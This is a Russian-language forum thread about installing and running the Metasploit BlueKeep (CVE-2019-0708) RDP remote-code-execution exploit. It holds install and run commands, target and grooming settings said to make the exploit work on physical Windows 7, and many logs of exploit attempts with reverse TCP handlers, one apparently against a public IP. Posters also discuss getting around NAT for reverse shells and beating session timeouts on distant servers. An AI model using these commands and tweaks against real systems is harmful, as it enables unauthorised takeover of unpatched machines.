Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Ссылка скрыта от гостей

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):

cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!

 

[Zlodei]

Приветствую, помогите при запуске оболчки armitage в консоле пишет
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by sleep.engine.atoms.ObjectAccess (file:/usr/share/armitage/armitage.jar) to method java.lang.ProcessImpl.getErrorStream()
WARNING: Please consider reporting this to the maintainers of sleep.engine.atoms.ObjectAccess
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Может кто решал уже проблему?

 

[Uzi Em]

Всем привет тажа самая проблема как и у мнгоих:

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.1.21:4444
[*] 91.203.174.254:3389 - Detected RDP on 91.203.174.254:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 91.203.174.254:3389 - The target is vulnerable.
[*] 91.203.174.254:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa8006a00000, Channel count 1.
[*] 91.203.174.254:3389 - Surfing channels ...
[*] 91.203.174.254:3389 - Lobbing eggs ...
[-] 91.203.174.254:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) >

Решил ли кто эту проблему? Тут писали как решить но я хз, как все поэтапно делать...

Ссылка скрыта от гостей

If your playing with the @Metasploit #bluekeep CVE-2019-0708 exploit module and none of the targets work. You can use a memdump with the #rekall pools plugin to find the NPP address #dfir #memoryforensics

 

[novikov433]

как можно обойти nat без статики, если без покупки статики провайдер не октрывает порты? можно ли использовать связку no Ip, ngrok, ipv6, прокси vps открыть порты ?

 

[ДмитрийNZ]

как можно обойти nat без статики, если без покупки статики провайдер не октрывает порты? можно ли использовать связку no Ip, ngrok, ipv6, прокси vps открыть порты ?

Детские игрушки

 

[YanPek]

Ребят я возможно полный дегенерат, но можно ли как-нибудь запустить это на Termux????

 

[T1G3R]

Ребят я возможно полный дегенерат, но можно ли как-нибудь запустить это на Termux????

да в чем проблема только неудобно будет ))))

 

[Triton]

как можно обойти nat без статики, если без покупки статики провайдер не октрывает порты? можно ли использовать связку no Ip, ngrok, ipv6, прокси vps открыть порты ?

купи vps и надо парится. vps стоит как пачка сигарет))

 

[Tony]

[*] Started reverse TCP handler on  @@@:4444
[*] @@@:3389    - Detected RDP on @@@:3389    (Windows version: 6.1.7600) (Requires NLA: No)
[+] @@@:3389    - The target is vulnerable.
[*] @@@:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] @@@:3389 - Surfing channels ...
[*] @@@:3389 - Lobbing eggs ...
[-] @@@:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

Данной проблемы ни у кого не возникло?

Эта ошибка возникает потому-что Win2k8/Win7 принудительно отключает сессию не вошедшего в систему юзера после 30 сек бездействия. Чтобы её избежать, нужно каждые n секунд или каждые n итераций цикла(отправляющего пакеты с шеллкодом) посылать "keepalive" пакеты aka движения мышью или нажатия клавишь. Я думаю разработчики специально не добавили данный функционал в публичный эксплоит, для защиты от кидисов)) Ведь чтобы протестировать системы в локальной сети этого времени достаточно, а вот отправить 100MB пакетов за 30 сек на удалённый сервер, где-нибудь в индии, уже не получится)))

 

[WhiteHacK]

Ведь чтобы протестировать системы в локальной сети этого времени достаточно, а вот отправить 100MB пакетов за 30 сек на удалённый сервер, где-нибудь в индии, уже не получится)

Проблема в том что даже в лабораторных (идеальных) условиях в локальной сети exploit все ровно не отрабатывает на физической машине.
Только лишь на виртуальной.

 

[Tony]

Проблема в том что даже в лабораторных (идеальных) условиях в локальной сети exploit все ровно не отрабатывает на физической машине.
Только лишь на виртуальной.

Ошибку ECONNRESET отдаёт или в BSOD отправляется?

set TARGET 1
set GROOMSIZE 100
set GROOMCHANNELCOUNT 0

С такими настройками работает на физической win7. Если из-за утечек памяти и смещения NPP отправляется в BSOD, то после перезагрузки отрабатывает 100%

 

[WhiteHacK]

Интересный факт, нашел одну физическую машину Win7 SP1 с обновлениями безопасности от 06.02.19, на сколько мне известно из отчетов, патч для CVE_2019_0708 был выпущен мелкософтом только в мае (поправьте меня если я не прав), но при проверке сканер показывает что система не уязвима к данной атаке, RDP работает, и настроен специально без проверки подлинности, АВ отключены, занятно конечно.
Это так, мысли вслух

 

[NeckFz]

Errno::ECONNRESET Connection reset by peer SSL_connect
Подскажите что делать?

 

[keysi111]

Errno::ECONNRESET Connection reset by peer SSL_connect
Подскажите что делать?

UNKNOWN - ошибка протокола SSL Начиная с Windows Vista, RDP использует протокол STARTTLS для запуска через SSL. У этого уровня есть свои собственные проблемы, такие как описанные выше, которые включают в себя плохую обработку основных сетевых ошибок или попытки установить связь с системами, имеющими какую-то несовместимость. Если вы получаете очень длинное сообщение об ошибке здесь (например, SSL3_GET_RECORD: неправильная версия), это потому, что у другой стороны есть ошибка в SSL, или у вашей собственной библиотеки SSL есть ошибка.

 

[Петручо]

этот эксплойт вроде как есть уже в метасплоите и чего то он не работает из за роутера .
нет возможности получить белый ip , хотя удаленный доступ к роутеру есть , там пробросил порты на свой ip и выдает следующее
[-] Handler failed to bind to х.х.х.х.:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[+] х.х.х.х.:3389 - The target is vulnerable.
[-] х.х.х.х.:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.

пробовал выставлять LHOST и роутера и свой , так же то же самое делал с RDP_CLIENT_IP
и не пойму , ему обязательно белый ip нужен , или он просто сам по себе нерабочий ?

 

[Tony]

[-] х.х.х.х.:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually

Он тебе же пишет, выстави опцию target вручную. set target 1, 2, 3 или 4

[
            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8003800000
            }
          ],
          [
            # This works with Virtualbox 6
            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8002407000
            }
          ],
          [
            # This address works on VMWare 15 on Windows.
            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8018C00000
              #'GROOMBASE' => 0xfffffa801C000000
            }
          ],
          [
            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'GROOMBASE' => 0xfffffa8102407000
            }
          ],
        ],

 

[Петручо]

да это я понял , сразу загуглил эту проблему и на гитхабе это уже описали . трабла в том что что бы ты ни выставил , он пишет одно и то же , и на гитхабе кстати та же тема .

 

[WhiteHacK]

этот эксплойт вроде как есть уже в метасплоите и чего то он не работает из за роутера .
нет возможности получить белый ip , хотя удаленный доступ к роутеру есть

Вы сначала в локальной сети его заставьте работать, а то по факту выходит так что все те вариации этого сплоита которые есть в паблике работают в основном только при тесте с виртуальной машиной, а при атаке на физические машины возникает куча нюансов, и если эту проблему кто то и решил то в паблике я этого еще не встречал, хотя может быть плохо искал.

 

[Петручо]

а вот тут упс , ступил , писал set targets вместо target , после правильного выставления пошли другие ошибки
1) Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError
2) Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer

Вы сначала в локальной сети его заставьте работать, а то по факту выходит так что все те вариации этого сплоита которые есть в паблике работают в основном только при тесте с виртуальной машиной, а при атаке на физические машины возникает куча нюансов, и если эту проблему кто то и решил то в паблике я этого еще не встречал, хотя может быть плохо искал.

на виртуалках часто проходит гладко , а в реале ни хрена .
но все равно попробую.

 

[Петручо]

че то ни хрена не пойму , разбирался почему сплойт не работает и по ошибкам нашел что потому что сервер терминалов не лиценизрован , лицензировал на уявимой виртуалке , после этого сплоит вообще перестал работать , при чем и на других виртуалках и на тех что в сети .
пишет
Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override

включил режим verbose ругается на сертификаты с сервера .

[*] Started reverse TCP handler on 192.168.13.101:4444
[*] 192.168.13.1:3389 - Verifying RDP protocol...
[*] 192.168.13.1:3389 - Attempting to connect using TLS security
[*] 192.168.13.1:3389 - Attempt to connect with TLS failed with error: SSL_NOT_ALLOWED_BY_SERVER
[*] 192.168.13.1:3389 - Attempting to connect using Standard RDP security
[*] 192.168.13.1:3389 - Verifying RDP protocol...
[*] 192.168.13.1:3389 - Attempting to connect using TLS security
[*] 192.168.13.1:3389 - Attempt to connect with TLS failed with error: SSL_NOT_ALLOWED_BY_SERVER
[*] 192.168.13.1:3389 - Attempting to connect using Standard RDP security
[*] 192.168.13.1:3389 - Detected RDP on 192.168.13.1:3389 (Windows version: N/A) (Requires NLA: No)
[-] 192.168.13.1:3389 - Server cert isn't RSA, this scenario isn't supported (yet).
[-] 192.168.13.1:3389 - Error communicating RDP protocol.
[*] 192.168.13.1:3389 - Cannot reliably check exploitability.
[-] 192.168.13.1:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.


настройки TLS стоят на разрешено всё
RDP_TLS_SECURITY_LEVEL 0

может я че то с настройками сплойта нашаманил и не помню , как сбросить все по умолчанию ?
и че можно сделать с SSL и сертификатами ?

 

[Петручо]

выставил set ForceExploit true и set target 2 (vbox)
и пошло
[*] Started reverse TCP handler on 192.168.13.101:4444
[*] 192.168.13.1:3389 - Verifying RDP protocol...
[*] 192.168.13.1:3389 - Attempting to connect using TLS security
[*] 192.168.13.1:3389 - Attempt to connect with TLS failed with error: SSL_NOT_ALLOWED_BY_SERVER
[*] 192.168.13.1:3389 - Attempting to connect using Standard RDP security
[*] 192.168.13.1:3389 - Verifying RDP protocol...
[*] 192.168.13.1:3389 - Attempting to connect using TLS security
[*] 192.168.13.1:3389 - Attempt to connect with TLS failed with error: SSL_NOT_ALLOWED_BY_SERVER
[*] 192.168.13.1:3389 - Attempting to connect using Standard RDP security
[*] 192.168.13.1:3389 - Detected RDP on 192.168.13.1:3389 (Windows version: N/A) (Requires NLA: No)
[-] 192.168.13.1:3389 - Server cert isn't RSA, this scenario isn't supported (yet).
[-] 192.168.13.1:3389 - Error communicating RDP protocol.
[*] 192.168.13.1:3389 - Cannot reliably check exploitability.
[*] 192.168.13.1:3389 - Verifying RDP protocol...
[*] 192.168.13.1:3389 - Attempting to connect using TLS security
[*] 192.168.13.1:3389 - Attempt to connect with TLS failed with error: SSL_NOT_ALLOWED_BY_SERVER
[*] 192.168.13.1:3389 - Attempting to connect using Standard RDP security
[-] 192.168.13.1:3389 - Server cert isn't RSA, this scenario isn't supported (yet).
[-] 192.168.13.1:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError



то есть ошибка другая , но на SSL все равно ругается